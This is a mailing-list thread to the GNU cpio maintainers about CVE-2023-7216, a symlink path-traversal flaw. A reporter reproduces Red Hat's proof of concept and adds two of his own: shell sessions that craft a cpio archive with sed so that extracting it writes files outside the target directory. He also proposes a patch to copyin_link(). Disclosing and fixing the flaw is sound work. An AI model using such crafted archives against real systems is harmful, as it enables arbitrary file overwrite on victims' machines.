Re:Is there a fix for this CVE-2023-7216?

[Peng]

Dear cpio maintainer:
        
    This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901
    
    CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
    
    Redhat CVE-2023-7216's Poc can be reproduced using the following method:
    ```
    [root@localhost home]# mkdir testcpio
    [root@localhost home]# ln -sf /tmp/ testcpio/tmp
    [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
    [root@localhost home]# cd  testcpio/
    [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
    tmp
    tmpYtrav.txt
    1 block
    [root@localhost testcpio]# cd ..
    [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
    [root@localhost home]# cpio -i < trav.cpio
    [root@localhost home]# cat /tmp/trav.txt
    TEST Traversal
    [root@localhost home]# cat tmp/trav.txt
    TEST Traversal
    ```
    Based on my understanding of the POC and analysis of CVE-2023-7216, I constructed two more POC scenarios.

    The POC1 can be reproduced using the following methods:    
        Machine A can use the tampered trav.cpio file to overwrite any file on machine B, which may lead to remote command execution.
        ``` Machine A
        [root@localhostA home]# mkdir testcpio
        [root@localhostA home]# ln -sf /tmp/ testcpio/tmp
        [root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
        [root@localhostA home]# cd  testcpio/
        [root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
        tmp
        tmpYtrav.txt
        1 block
        [root@localhost testcpio]# cd ..
        [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
        ```
        Assume that machine A transfers files to machine B through scp or other file transfer methods. CVE-2023-7216 is triggered when Machine B opens trav.cpio
        ```Machine B
        [root@localhostB home]# cpio -i < trav.cpio
        [root@localhostB home]# cat /tmp/trav.txt
        TEST Traversal
        [root@localhostB home]# cat tmp/trav.txt
        TEST Traversal
        ```
    Impact of POC1: This indicates that any cpio archive file that contains symlinks may cause security risks such as path traversal.


    The POC2 can be reproduced using the following methods:
        ```
        [root@localhost home]# mkdir testcpio
        [root@localhost home]# ln -sf /tmp/ testcpio/tmp
        [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
        [root@localhost home]# cd  testcpio/
        [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
        tmp
        tmpYtrav.txt
        1 block
        [root@localhost testcpio]# cd ..
        [root@localhost home]# mkdir dirA
        [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio 
        [root@localhost home]# cpio -i < trav.cpio -D /home/dirA
        [root@localhost home]# cat /tmp/trav.txt
        TEST Traversal
        [root@localhost home]# cat dirA/tmp/trav.txt
        TEST Traversal
        ```

    Impact of POC2: When the -D option is used, the cpio file is expected to be decompressed in the specified directory. However, due to the impact of CVE-2023-7216, the file is also generated in the symlink directory, which is not as expected.Like CVE-2015-1197. When the --no-absolute-filenames option is used, the decompressed file should be generated in the current directory instead of the symlink directory.
    First of all, I would like to discuss an issue with you, that is, when fixing CVE-2015-1197, the copy_link () function generates symlinks directly through the symlink () function if the --no-absolute-filenames option is not used when processing symlinks. This means that in this case, cpio allows writing files in arbitrary directories through symlinks. Is this what cpio was designed for?
    I believe this design is the root cause of CVE-2023-7216. If you think this is a reasonable design, please let me know your reasons and provide a solution for CVE-2023-7216.
    If you agree with me that cpio should not allow writing files in arbitrary directories through symlinks,then we can discuss my solution.
    In my views, I don't think we can guarantee that the cpio archive does not contain any symlinks. We must handle each symlink as the same as the fix for CVE-2015-1197 during decompression. So I made a patch. I have attached the patch in the mail. If you have a better fix, please let me know.
        
    Look forward to your feedback and suggestions soon.
    
Best Regards,
Peng
From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001
From: Peng <2773414454@qq.com>
Date: Thu, 29 Feb 2024 17:22:11 +0800
Subject: [PATCH] deafult use symlink_placeholder() to fix Path Traversal

---
 src/copyin.c | 26 +-------------------------
 1 file changed, 1 insertion(+), 25 deletions(-)

diff --git a/src/copyin.c b/src/copyin.c
index ace0a02..c454313 100644
--- a/src/copyin.c
+++ b/src/copyin.c
@@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des)
       link_name = xstrdup (file_hdr->c_tar_linkname);
     }
 
-  if (no_abs_paths_flag)
-    symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
-  else
-    {
-      res = UMASKED_SYMLINK (link_name, file_hdr->c_name,
-			     file_hdr->c_mode);
-      if (res < 0 && create_dir_flag)
-	{
-	  create_all_directories (file_hdr->c_name);
-	  res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode);
-	}
-      if (res < 0)
-	symlink_error (link_name, file_hdr->c_name);
-      else if (!no_chown_flag)
-	{
-	  uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid;
-	  gid_t gid = set_group_flag ? set_group : file_hdr->c_gid;
-	  if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM)
-	    chown_error_details (file_hdr->c_name, uid, gid);
-	}
-
-      if (retain_time_flag)
-	set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime,
-			file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW);
-    }
+  symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
   free (link_name);
 }
 
-- 
2.33.0

------------------ Original ------------------

From: "Peng" <2773414454@qq.com>;

Date: Thu, Feb 29, 2024 07:02 PM

To: "bug-cpio"<bug-cpio@gnu.org>;"ntait"<ntait@redhat.com>;"gray"<gray@gnu.org.ua>;"mrehak"<mrehak@redhat.com>;

Subject: Re:Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:
		
	This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901
	
	CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
	
	Redhat CVE-2023-7216's Poc can be reproduced using the following method:
	```
	[root@localhost home]# mkdir testcpio
	[root@localhost home]# ln -sf /tmp/ testcpio/tmp
	[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
	[root@localhost home]# cd  testcpio/
	[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
	tmp
	tmpYtrav.txt
	1 block
	[root@localhost testcpio]# cd ..
	[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
	[root@localhost home]# cpio -i < trav.cpio
	[root@localhost home]# cat /tmp/trav.txt
	TEST Traversal
	[root@localhost home]# cat tmp/trav.txt
	TEST Traversal
	```
	First of all, I would like to confirm with you, do you accept CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio software? 
	If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if there is a better fix, please point it out.
	
	CVE-2023-7216 is similar to CVE-2015-1197,Both of them use symlink to cause Path Traversal.The CVE-2015-1197 fix uses symlink_placeholder () to fix a Path Traversal issue in the --no-absolute-filenames scenario.However, CVE-2023-7216 proves that path traversal also exists in other scenarios. 
	
	So I made a patch to fix CVE-2023-7216, copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.
	
	Look forward to your feedback and suggestions soon.
	
Best Regards,
Peng

------------------ Original ------------------

From: "2773414454" <2773414454@qq.com>;

Date: Tue, Feb 20, 2024 11:03 AM

To: "bug-cpio"<bug-cpio@gnu.org>;

Subject: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:

    https://nvd.nist.gov/vuln/detail/CVE-2023-7216
    NVD does not provide any related patch information.

    Is there a fix for cpio's CVE-2023-7216?
      [1] If not, what is the repair plan for cpio?
      [2] If yes, can you indicate which submissions fix CVE-2023-7216?

peng

0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
Description: Binary data